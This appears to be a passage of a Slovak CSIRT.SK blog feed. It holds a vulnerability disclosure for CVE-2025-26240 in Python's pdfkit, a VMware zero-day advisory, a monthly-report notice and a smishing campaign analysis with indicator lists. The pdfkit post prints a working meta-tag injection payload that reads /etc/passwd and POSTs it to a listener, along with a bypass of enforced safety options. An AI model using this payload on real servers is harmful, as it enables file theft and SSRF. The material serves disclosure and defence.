<h2 class="wp-block-heading"><strong>Zhrnutie</strong></h2>



<p><strong><strong>Bezpečnostní analytici CSIRT.SK objavili z</strong>raniteľnosť CVE-2025-26240</strong> v knižnici <strong>pdfkit</strong> v jazyku Python spočíva v metóde <strong>from_string</strong>, ktorá spracúva používateľské vstupy HTML, ktoré však neošetruje. Metóda <strong>from_string</strong> používa metaznačky, ktorých názvy začínajú na &#8220;pdfkit-&#8220;, a ich hodnoty konvertuje na parametre príkazového riadku pre nástroj <strong>wkhtmltopdf</strong>. Túto analýzu vstupov vykonáva metóda <strong>_find_options_in_meta</strong>, ktorá sa nachádza v súbore <strong>pdfkit/pdfkit.py</strong>. Hoci táto funkcia môže byť v určitých prípadoch užitočná (napríklad nastavenie veľkosti papiera), niektoré argumenty <strong>wkhtmltopdf</strong> predstavujú bezpečnostné riziko.</p>



<h2 class="wp-block-heading"><strong>Jednoduchá ukážka zneužitia zraniteľnosti (POC)</strong></h2>



<p>Keď do metódy <strong>from_string</strong> vložíme nasledujúce údaje HTML, budeme môcť prečítať obsah súboru /etc/passwd.</p>



<pre class="wp-block-code"><code>&lt;meta name='pdfkit---quiet' content=''&gt;<br>&lt;meta name='pdfkit---enable-local-file-access' content=''&gt;<br>&lt;meta name='pdfkit---post-file' content=''&gt;<br>&lt;meta name='pdfkit-file--a' content='/etc/passwd'&gt;<br>&lt;meta name='pdfkit-http://127.0.0.1:8888?LFI-TEST=--' content='--cache-dir'&gt;<br>&lt;h1&gt;LFI POC&lt;/h1&gt;</code></pre>



<p>Existuje niekoľko obmedzení týkajúcich sa argumentov odosielaných do <strong>wkhtmltopdf</strong>. Prvým je, že kľúč musí obsahovať dve pomlčky, čo je dôvod, prečo posledná metaznačka obsahuje vo svojom názve „&#8211;“. Implementáciu tejto kontroly možno nájsť v metóde <strong>_normalize_options</strong>, ktorá sa nachádza v súbore <strong>pdfkit/pdfkit.py</strong>.</p>



<pre class="wp-block-code"><code>for key, value in list(options.items()):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if '--' not in key:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; normalized_key = '--%s' % self._normalize_arg(key)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; normalized_key = self._normalize_arg(key)</code></pre>



<p>Kvôli nedostatočnej validácii môžeme odovzdávať argumenty, ktoré prijímajú viacero hodnôt, nielen dvojice kľúč-hodnota.</p>



<p>Keď metóde <strong>from_string</strong> odovzdáme skúšobný súbor HTML, vidíme, že príkaz vygenerovaný a vykonaný metódou <strong>subprocess.Popen</strong> vyzerá nasledovne:</p>



<pre class="wp-block-code"><code>&#91;'/usr/local/bin/wkhtmltopdf', '--quiet', '--enable-local-file-access', '--post-file', 'file--a', '/etc/passwd', 'http://127.0.0.1:8080/?lfi-test=--', '--cache-dir', '-', '-']</code></pre>



<p>Z&nbsp;toho vyplýva nasledujúci príkaz:</p>



<pre class="wp-block-code"><code>/usr/local/bin/wkhtmltopdf –quiet --enable-local-file-access --post-file <strong>file--a</strong> <strong>/etc/passwd</strong> <strong>http://127.0.0.1:8888/?lfi-test=--</strong> --cache-dir - -</code></pre>



<p>Tento príkaz odošle obsah súboru <strong>/etc/passwd</strong> ako príponu v požiadavke POST na adresu <strong>http://127.0.0.1:8888/?lfi-test=&#8211;</strong> s parametrom <strong>file&#8211;a</strong>. Parameter <strong>&#8211;cache-dir</strong> sme pridali len preto, aby sme odstránili dodatočnú pomlčku, ktorú pridala knižnica <strong>pdfkit</strong>. Tým sa zabezpečí úspešné spustenie nástroja <strong>wkhtmltopdf</strong>.</p>



<p>Pri zneužití tejto zraniteľnosti môžeme pozorovať, že náš Python listener prijíma obsah súboru <strong>/etc/passwd</strong>.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="961" height="482" src="/wp-content/uploads/2025/03/CVE-2025-26240-image-1.png" alt="" class="wp-image-2156"/></figure>



<p>Rovnako môžeme spustiť ľubovoľné skripty JavaScript pomocou parametra príkazového riadka <strong>&#8211;script</strong>, ktorý po vygenerovaní PDF spustí daný kód JavaScript, čo vedie k SSRF a ďalším potenciálnym zraniteľnostiam.</p>



<h2 class="wp-block-heading"><strong>Obídenie bezpečnostných prvkov pdfkit</strong></h2>



<p>Knižnica <strong>pdfkit</strong> umožňuje vývojárom poskytnúť slovník volieb pre priame voľby, ktoré budú odovzdané nástroju <strong>wkhtmltopdf</strong>. Hlavným problémom je, že tieto voľby možno ľahko obísť vzhľadom na spôsob, akým Python pracuje so slovníkmi.</p>



<p>Inicializácia volieb je definovaná v súbore <strong>pdfkit/pdfkit.py</strong> nasledovne:</p>



<pre class="wp-block-code"><code>self.options = OrderedDict()<br>if self.source.isString():<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.options.update(self.<strong>_find_options_in_meta</strong>(url_or_file))<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.environ = self.configuration.environ<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if options is not None:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.options.<strong>update</strong>(options)</code></pre>



<p>Hlavným problémom je, že Python pri použití metódy <strong>update</strong> zachováva poradie kľúčov. Napríklad, ak máme slovník <strong>{&#8220;a&#8221;: 10, &#8220;b&#8221;: 20}</strong> a zavoláme naň funkciu <strong>update</strong> s <strong>{&#8220;a&#8221;: 15}</strong>, výsledný slovník bude <strong>{&#8220;a&#8221;: 15, &#8220;b&#8221;: 20}</strong>.</p>



<p>Útočník môže vždy manipulovať s poradím argumentov príkazového riadka zasielaných <strong>wkhtmltopdf</strong>. Ak sa vývojár pokúsi vynútiť bezpečnostné voľby, ako napríklad <strong>{&#8220;disable-javascript&#8221;: &#8220;&#8221;, &#8220;disable-local-file-access&#8221;: &#8220;}</strong>, útočník môže najprv nastaviť tieto možnosti a potom ich obísť pridaním ich náprotivkov, t.j. &#8220;<strong>enable-javascript</strong>&#8221; alebo &#8220;<strong>enable-local-file-access</strong>&#8220;.<strong><br></strong></p>



<h2 class="wp-block-heading"><strong>Dopad</strong></h2>



<ol>
<li>Local File Inclusion (LFI) a&nbsp;únik údajov</li>



<li>Útočníci môžu využiť argument <strong>&#8211;post-file</strong> na získanie prístupu k citlivým súborom na serveri, ako je <strong>/etc/passwd</strong>. To môže viesť k neoprávnenému odhaleniu systémových informácií, čo môže útočníkovi pomôcť pri zvýšení oprávnení alebo ďalšom zneužití hostiteľského počítača.</li>



<li>Server-Side Request Forgery (SSRF)</li>



<li>Zneužitím parametrov príkazového riadka, ako <strong>&#8211;script</strong>, môže útočník vykonať neoprávnené požiadavky HTTP na interné alebo externé služby. To môže viesť k:<ol><li>prístupu k interným zdrojom, ktoré by nemali byť verejne dostupné.</li></ol><ol><li>obchádzaniu bezpečnostných mechanizmov, ako sú firewally alebo rate limity pre API.</li></ol>
<ol>
<li>interakcia s metadátovými cloudovými službami s cieľom získať prihlasovacie údaje.</li>
</ol>
</li>
</ol>



<h2 class="wp-block-heading"><strong>Najjednoduchšie riešenie pre vývojárov</strong></h2>



<p>Najjednoduchším riešením zraniteľnosti CVE-2025-26240 je pravdepodobne použitie iných metód ako <strong>from_string</strong>. Vývojár môže napríklad uložiť poskytnuté HTML do dočasného súboru a potom použiť metódu <strong>from_file</strong>, ktorá neanalyzuje metaznačky.</p>



<h2 class="wp-block-heading"><strong>Zdroj:</strong></h2>



<ul>
<li><a href="https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-26240&amp;scoretype=vmscore">https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-26240&amp;scoretype=vmscore</a></li>
</ul>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2155/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Broadcom odstránil aktívne zneužívané zraniteľnosti virtualizačnej platformy VMware</title>
		<link>/posts/2153</link>
					<comments>/posts/2153#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 17 Mar 2025 15:38:08 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Broadcom]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[VMware]]></category>
		<guid isPermaLink="false">/?p=2153</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Spoločnosť Broadcom vydala bezpečnostné aktualizácie na svoje virtualizačné platformy VMware ESXi, Workstation a Fusion ktoré opravujú 3 aktívne zneužívané zero-day...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>
<p><strong>Spoločnosť Broadcom vydala bezpečnostné aktualizácie na svoje virtualizačné platformy VMware ESXi, Workstation a Fusion ktoré opravujú 3 aktívne zneužívané zero-day zraniteľnosti, z&nbsp;čoho jedna je označená ako kritická.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>VMware ESXi 8.0 bez aplikovanej záplaty ESXi80U3d-24585383</li>



<li>VMware ESXi 8.0 bez aplikovanej záplaty ESXi80U2d-24585300</li>



<li>VMware ESXi 7.0 bez aplikovanej záplaty ESXi70U3s-24585291</li>



<li>VMware Workstation 17.X vo verziách starších ako 17.6.3</li>



<li>VMware Fusion 13.X vo verziách starších ako 13.6.3</li>
</ul>



<p><strong>Pozn.:</strong></p>



<ul>
<li><strong>Uvedené produkty sú súčasťou produktov Broadcom VMware Cloud Foundation, VMware Telco Cloud Platform a VMware Telco Cloud Infrastructure.</strong></li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Aktívne zneužívané zero-day zraniteľnosti:</u></strong></p>



<p><strong>CVE-2025-22224 </strong>(CVSS 3.1 skóre: 9,3)</p>



<p>Kritická zraniteľnosť typu TOCTOU (Time-of-Check Time-of-Use) umožňuje zápis do pamäte mimo povolených hodnôt v&nbsp;rámci <strong>VMware ESXi a Workstation</strong>. Lokálny útočník s&nbsp;oprávneniami administrátora na virtuálnom stroji by ju mohol zneužiť na <strong>vykonanie kódu</strong> <strong>v&nbsp;kontexte procesu VMX bežiaceho</strong> <strong>na hostiteľskom stroji</strong>.</p>



<p><strong>CVE-2025-22225 </strong>(CVSS 3.1 skóre: 8,2)</p>



<p>Zraniteľnosť vo <strong>VMware ESXi</strong> by lokálny autentifikovaný útočník s&nbsp;právomocami administrátora v&nbsp;rámci procesu VMX mohol zneužiť na <strong>zápis do pamäte kernelu</strong> a&nbsp;<strong>únik zo sandboxového prostredia</strong>.</p>



<p><strong>CVE-2025-22226 </strong>(CVSS 3.1 skóre: 7,1)</p>



<p><strong>VMware ESXi, Workstation, and Fusion </strong>obsahujú zraniteľnosť umožňujúcu čítanie pamäte mimo povolených hodnôt v&nbsp;rámci HGFS (Host Guest File System). Lokálny útočník s&nbsp;oprávneniami administrátora na virtuálnom stroji by ju mohol zneužiť na <strong>získanie obsahu pamäte procesu VMX</strong>.</p>



<p><strong>Podľa Microsoft Threat Intelligence Center sú zraniteľnosti aktívne zneužívané. Úspešné zneužitie všetkých uvedených zraniteľností vyžaduje administrátorský prístup k&nbsp;virtuálnym strojom. </strong><a href="https://doublepulsar.com/use-one-virtual-machine-to-own-them-all-active-exploitation-of-esxicape-0091ccc5bdfc"><strong>Zreťazením uvedených zraniteľností</strong></a><strong> je možné dosiahnuť úplný únik z&nbsp;virtuálneho prostredia.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie kódu</strong></li>



<li><strong>Únik zo sandboxového prostredia</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať v&nbsp;závislosti od používanej verzie VMware ESXi bezodkladnú inštaláciu záplat ESXi80U3d-24585383, ESXi80U2d-24585300 alebo ESXi70U3s-24585291 a&nbsp;aktualizáciu VMware Workstation na verziu 17.6.3 a VMware Fusion na verziu 13.6.3.</p>



<p>Pri aktualizácii ostatných závislých produktov postupujte podľa pokynov výrobcu zverejnených v rámci <a href="https://knowledge.broadcom.com/external/article?legacyId=88287">KB88287</a> (VMware Cloud Foundation) a <a href="https://knowledge.broadcom.com/external/article/389385">KB389385</a> (VMwareTelco Cloud Platform, VMware Telco Cloud Infrastructure).</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390">https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390</a></li>



<li><a href="https://arcticwolf.com/resources/blog/three-vmware-zero-days-exploited-in-wild-patched-by-broadcom/">https://arcticwolf.com/resources/blog/three-vmware-zero-days-exploited-in-wild-patched-by-broadcom/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/broadcom-fixes-three-vmware-zero-days-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/broadcom-fixes-three-vmware-zero-days-exploited-in-attacks/</a></li>



<li><a href="https://www.darkreading.com/remote-workforce/zero-days-risk-vm-escape-attacks">https://www.darkreading.com/remote-workforce/zero-days-risk-vm-escape-attacks</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2153/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – február 2025</title>
		<link>/posts/2148</link>
					<comments>/posts/2148#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 14 Mar 2025 13:06:33 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2148</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci február 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci február 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/03/MS202502.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 02/2025 PDF (1 874 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2148/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>„Smishingová triáda“ využíva nové techniky pri podvodoch</title>
		<link>/posts/2122</link>
					<comments>/posts/2122#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Mar 2025 16:42:32 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2122</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/china.jpg" alt="" /></p>Smishingové útoky predstavujú stále väčšiu hrozbu pre jednotlivcov ako aj organizácie na celom svete, vrátane Slovenska. Tieto podvody, pri ktorých...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/china.jpg" alt="" /></p>
<p>Smishingové útoky predstavujú stále väčšiu hrozbu pre jednotlivcov ako aj organizácie na celom svete, vrátane Slovenska. Tieto podvody, pri ktorých útočníci zneužívajú SMS správy alebo moderné komunikačné platformy, ako sú iMessage a&nbsp;RCS (Rich Communication Services), s&nbsp;cieľom získať citlivé údaje, sú čoraz sofistikovanejšie.</p>



<p>V&nbsp;posledných dňoch bola na Slovensku zaznamenaná kampaň, pri ktorej sa útočníci vydávali za Všeobecnú zdravotnú poisťovňu (VšZP) s&nbsp;cieľom vylákať citlivé informácie. Možno ste už aj vy dostali SMS správu s odkazom na podvrhnutú webovú stránku, ako napríklad:</p>



<ul>
<li><em>hXXps://obnovypoistenca[.]com (Fingerprint:</em><em>a08f41efa3a9fd9cd98220234be4a7adb2f58cdd)</em></li>



<li><em>hXXps://informacie-poistenca[.]com (Fingerprint: 11a1bf8a43834cc674800d1a2a666bf173d9550e)</em></li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="473" height="1024" src="/wp-content/uploads/2025/03/Smishingova_triada_01-473x1024.png" alt="" class="wp-image-2130"/></figure>



<p>Obrázok 1 Vzorka podvodnej SMS správy</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="761" height="754" src="/wp-content/uploads/2025/03/Smishingova_triada_02.png" alt="" class="wp-image-2131"/></figure>



<p>Obrázok 2 Klasifikácia kampane (Zdroj: Analýza JoeSandbox)</p>



<p><strong>O&nbsp;čo ide útočníkom? Mechanizmus útoku a technické aspekty</strong></p>



<p>Súčasné smishingové kampane sú prepracované a dobre organizované, kombinujú pokročilé sociálne inžinierstvo s phishingovými webmi a falošnými platobnými bránami. Po otvorení podvodnej webovej stránky, odkaz na ktorú nám prišiel SMS správou (obrázok č.1), vás formulár vyzve na vyplnenie osobných údajov, vrátane mena, priezviska, dátumu narodenia, adresy bydliska, telefónneho čísla a emailovej adresy (obrázok č.3).</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="785" height="601" src="/wp-content/uploads/2025/03/Smishingova_triada_03.png" alt="" class="wp-image-2127"/></figure>



<p>Obrázok 3 Úvodné zobrazenie podvrhnutej stránky</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="675" height="558" src="/wp-content/uploads/2025/03/Smishingova_triada_04.png" alt="" class="wp-image-2128"/></figure>



<p>Obrázok 4 Formulár pre vloženie údajov o platobnej karte</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="573" height="618" src="/wp-content/uploads/2025/03/Smishingova_triada_05.png" alt="" class="wp-image-2129"/></figure>



<p>Obrázok 5 Formulár pre vloženie OTP</p>



<p>Po vyplnení týchto informácií sa vám zobrazí požiadavka na zadanie údajov o platobnej karte a&nbsp;neskôr aj žiadosť o&nbsp;zadanie druhého faktoru overenia formou OTP (jednorazový kód).</p>



<p>Takto útočníci získajú vaše osobné informácie, a&nbsp;zároveň údaje z&nbsp;platobnej karty. OTP kód, ktorý Vám po zadaní karty príde, slúži na jej pridanie do útočníkovej mobilnej peňaženky. Obeť si však túto skutočnosť nemusí v&nbsp;SMS správe s&nbsp;kódom všimnúť, na čo sa podvodníci spoliehajú.</p>



<p><strong>Smishingová triáda a&nbsp;jej techniky</strong></p>



<p>Hlavnou metódou finančného zisku čínskej útočnej skupiny pomenovanej „Smishingová triáda“ je tzv. carding – nezákonné získavanie, predaj a používanie odcudzených platobných údajov. Táto technika bola kedysi doménou ruských hackerov, ale v posledných rokoch sa kyberzločinecké skupiny v Číne prispôsobili novým bankovým technológiám a vyvinuli vlastné inovatívne metódy.</p>



<p>Jednou z najobľúbenejších metód Smishingovej triády je konverzia ukradnutých údajov na mobilné peňaženky (Apple Pay, Google Pay), ktoré umožňujú vykonávanie platieb online aj v bežných obchodoch (tap-to-pay). Po získaní údajov od obete prostredníctvom podvodnej stránky, útočníci pripoja bankovú kartu obete k&nbsp;platobnej aplikácii. Na základe nižšie uvedených techník dokážu následne vykonávať z&nbsp;tejto karty viacero transakcií po celom svete súčasne.</p>



<p>Podvodné webové stránky, ktoré slúžia pre zber platobných údajov od obetí, pravidelne menia IP adresy a využívajú hostingové spoločnosti po celom svete, čím sťažujú ich detekciu a blokovanie. Na tento účel často používajú služby tzv. bulletproof hostingov, ktoré ponúkajú anonymitu a odolnosť voči zásahom orgánov činných v trestnom konaní. Ďalej využívajú techniky ako fast-flux DNS, kde sa IP adresy rýchlo menia v krátkych intervaloch, alebo reverzné proxy servery na maskovanie svojej infraštruktúry.</p>



<p><strong>Nové podvodné techniky a mechanizmus krádeže financií</strong></p>



<p>Okrem tradičných podvodných techník útočníci začali využívať novú metódu, pri ktorej zneužívajú platobné plikácie Apple Pay, Google Pay. Získané informácie o platobných kartách obete a&nbsp;OTP (jednorazový kód), ktorý príde na jej zariadenie im umožňujú pridať platobnú kartu obete do svojej mobilnej peňaženky.</p>



<p>Pre zefektívnenie krádeže financií zo zneužitých kariet ďalej využijú metódu označovanú ako Ghost Tap. Funguje na princípe prenosu signálu pre NFC transakciu na viacero vzdialených zariadenia. Jednou z&nbsp;možností realizácie tohto útoku je škodlivá aplikácia ZNFC, ktorú má útočník nainštalovanú v&nbsp;telefóne s&nbsp;peňaženkou s&nbsp;ukradnutými kartami. Pomocou aplikácie pošle legitímny NFC signál cez internet zariadeniam svojich bielych koní, práve platiacich pri platobných termináloch v&nbsp;obchodoch na ľubovoľných miestach sveta. Takto môže vykonať viacero transakcií prakticky súčasne, čím dosiahne vyšší zisk z&nbsp;karty pred nahlásením krádeže a&nbsp;jej zablokovaním. Malvér ZNFC sa predáva na internete za 500 USD mesačne, pričom v cene je zahrnutá nepretržitá zákaznícka podpora, ktorá pomáha podvodníkom riešiť prípadné technické problémy.</p>



<p><strong>Slovenské prepojenia a objavené hrozby</strong></p>



<p>Dňa 12. februára 2025 CSIRT.SK identifikoval podozrivé domény zneužívajúce identitu Všeobecnej zdravotnej poisťovne. Jednou z týchto podvodných webových stránok bola <em>hXXps://informacie-poistenca[.]com</em>. Analýzou otvorených zdrojov sme zistili, že webová stránka bola hosťovaná na IP adrese 91.202.233.186, ktorá patrí do rozsahu ruskej spoločnosti PROSPERO OOO. Z analýzy vyplynulo, že táto spoločnosť hostuje viac ako 10 000 podozrivých domén.</p>



<p>Zdroj: <em><a href="https://urlscan.io/search/#page.asn:%22AS200593%22">https://urlscan.io/search/#page.asn:%22AS200593%22</a></em></p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="738" src="/wp-content/uploads/2025/03/Smishingova_triada_06-1024x738.png" alt="" class="wp-image-2126"/></figure>



<p>Obrázok 6 Reverzná pasívna DNS analýza IP adresy 91.202.233.186 (Zdroj: VirusTotal)</p>



<p>Ďalšia podvodná stránka <em>hXXps://obnovypoistenca[.]com</em>, ktorá zneužívala identitu VšZP, bola hosťovaná na IP adrese 62.4.16.155. Táto adresa patrí francúzskej hostingovej spoločnosti SCALEWAY S.A.S. Na danej IP adrese je hostovaných viacero domén, ktoré služba VirusTotal označila ako podozrivé. Konkrétne od 28.02.2025 sa na IP adrese 62.4.16.155 nachádzalo viacero phishingových domén zameraných na finančné inštitúcie.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="463" src="/wp-content/uploads/2025/03/Smishingova_triada_07-1024x463.png" alt="" class="wp-image-2125"/></figure>



<p>Obrázok 7 Podozrivé webové stránky na IP adrese 62.4.16.155 (Zdroj: VirusTotal)</p>



<h1 class="wp-block-heading">Phishingové súpravy ako základ podvodných webov</h1>



<p>Spomenuté podvodné webové stránky neboli vytvorené unikátne pre každú kampaň, ale využívali phishingové súpravy (phishing kits), ktoré útočníkom umožnili rýchlo a jednoducho vytvárať podvodné stránky napodobňujúce webové služby legitímnych organizácií. Takéto súpravy obsahujú hotové šablóny, skripty na kradnutie údajov a mechanizmy na obchádzanie bezpečnostných kontrol.</p>



<p>Jednou z&nbsp;aktivít Smishingovej triády je aj vývoj a&nbsp;predaj phishingových kitov. Spoločnosť Resecurity dokázala získať jednu z&nbsp;týchto phishingových súprav a vykonať jej reverzné inžinierstvo. Výsledky analýzy odhalili viacero čínskych jazykových stôp, vrátane prezývky účtu na Telegrame &#8220;wangduoyu8&#8221;. Dotyčný aktér bol už v minulosti známy svojimi aktivitami v oblasti kybernetických podvodov a predaja phishingových nástrojov. Táto osoba prevádzkuje skupinu na platforme Telegram &#8211; &#8220;dy_tongbu&#8221;, ktorá vznikla 23. februára 2023 a má vyše 2 700 členov. V&nbsp;skupine sú podrobné návody a ukážky phishingových/smishingových súprav so zameraním najmä na organizácie poskytujúce finančné služby, ako sú Mastercard, Visa a PayPal.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="849" height="634" src="/wp-content/uploads/2025/03/Smishingova_triada_08.png" alt="" class="wp-image-2124"/></figure>



<p>Obrázok 8 Screenshot ponuky phishingovej súpravy na sociálnej sieti Telegram (Zdroj: resecurity.com)</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="821" height="569" src="/wp-content/uploads/2025/03/Smishingova_triada_09.png" alt="" class="wp-image-2123"/></figure>



<p>Obrázok 9 Screenshot ponuky phishingovej súpravy na platforme Telegram (Zdroj: resecurity.com)</p>



<p><strong>Záver</strong></p>



<p>Smishingové útoky, ako ukazuje prípad zneužívania identity Všeobecnej zdravotnej poisťovne, sa stávajú čoraz sofistikovanejšími a nebezpečnejšími pre jednotlivcov ale aj organizácie. Útočníci kombinujú moderné techniky sociálneho inžinierstva, phishingových webov a falošných platobných brán, čím sú schopní získať citlivé údaje a vykonávať nezákonné transakcie cez mobilné platobné aplikácie. Rovnako sa čoraz častejšie využívajú nové techniky, ako je Ghost Tap, na vzdialený prenos signálu NFC pre realizáciu platieb, čo ešte viac sťažuje identifikáciu a prevenciu týchto útokov.</p>



<p>Dôležité je, aby organizácie a jednotlivci pravidelne prehodnocovali svoje bezpečnostné opatrenia a vzdelávali sa v oblasti rozpoznávania podvodných aktivít. Na začiatok si môžete vyskúšať cvičenie na <a href="https://ctf.kyberakademia.sk/">rozpoznanie phishingových správ</a>, ktoré sme pre Vás pripravili.</p>



<p><strong>IoC (Indikátory kompromitácie):</strong></p>



<ul>
<li>wangduoyu[.]me</li>



<li>wangduoyu[.]shop</li>



<li>wangduoyu[.]site</li>



<li>poczta-polska[.]cc</li>



<li>ususmx[.]top</li>



<li>ususnb[.]top</li>



<li>ususgs[.]top</li>



<li>ususcgh[.]top</li>



<li>uspoddp[.]top</li>



<li>uspsjh[.]top</li>



<li>ususnu[.]top</li>



<li>usushk[.]top</li>



<li>ususcsa[.]top</li>



<li>uspoky[.]top</li>



<li>usplve[.]top</li>



<li>ususcac[.]top</li>



<li>uspshhg[.]top</li>



<li>uspodad[.]top</li>



<li>uspogumb[.]top</li>



<li>uspsuiu[.]top</li>



<li>uspshhg[.]top</li>



<li>uspsuiu[.]top</li>



<li>uspskkq[.]top</li>



<li>ususuua[.]top</li>



<li>uspodaa[.]top</li>



<li>uspoadc[.]top</li>



<li>uspshhg[.]top</li>



<li>usplve[.]top</li>



<li>usushk[.]top</li>



<li>uspshhg[.]top</li>



<li>ususcgh[.]top</li>



<li>ususnu[.]top</li>



<li>ususnb[.]top</li>



<li>uspoddp[.]top</li>



<li>ususuua[.]top</li>



<li>https://uspsdg[.]top/php/app/index/check-status.php?t=169327492485 (vulnerable parameter)</li>



<li>https://obnovy-poistenca[.]com</li>



<li>15.197.130.221</li>



<li>https://informacie-poistenca[.]com</li>



<li>91.202.233.186</li>



<li>https://mpvsr[.]buzz/</li>



<li>104.21.48.1</li>



<li>104.21.16.1</li>



<li>104.21.32.1</li>



<li>104.21.80.1</li>



<li>104.21.96.1</li>



<li>104.21.64.1</li>



<li>104.21.112.1</li>



<li>2606:4700:3030::6815:7001</li>



<li>2606:4700:3030::6815:2001</li>



<li>2606:4700:3030::6815:4001</li>



<li>2606:4700:3030::6815:3001</li>



<li>2606:4700:3030::6815:5001</li>



<li>2606:4700:3030::6815:1001</li>



<li>2606:4700:3030::6815:6001</li>



<li>https://abre.ai/l4FS</li>



<li>167.71.108.29</li>



<li>http://obnovit-poistenca[.]com/</li>



<li>45.139.104.81</li>



<li>https://obnovit-poistenie[.]com/</li>



<li>https://poistenie-sk[.]com/app</li>



<li>https://wordpress-sk-zseobecna-marinakhawla3638033[.]codeanyapp[.]com/sk/sksiha/</li>



<li>wordpress-sk-zseobecna-marinakhawla3638033[.]codeanyapp[.]com</li>



<li>198.199.109.95</li>



<li>https://overovacl-prostredie[.]com</li>



<li>172.67.208.25</li>



<li>104.21.37.121</li>



<li>2606:4700:3033::ac43:d019</li>



<li>2606:4700:3031::6815:2579</li>



<li>https://kontakt-vszp[.]com</li>



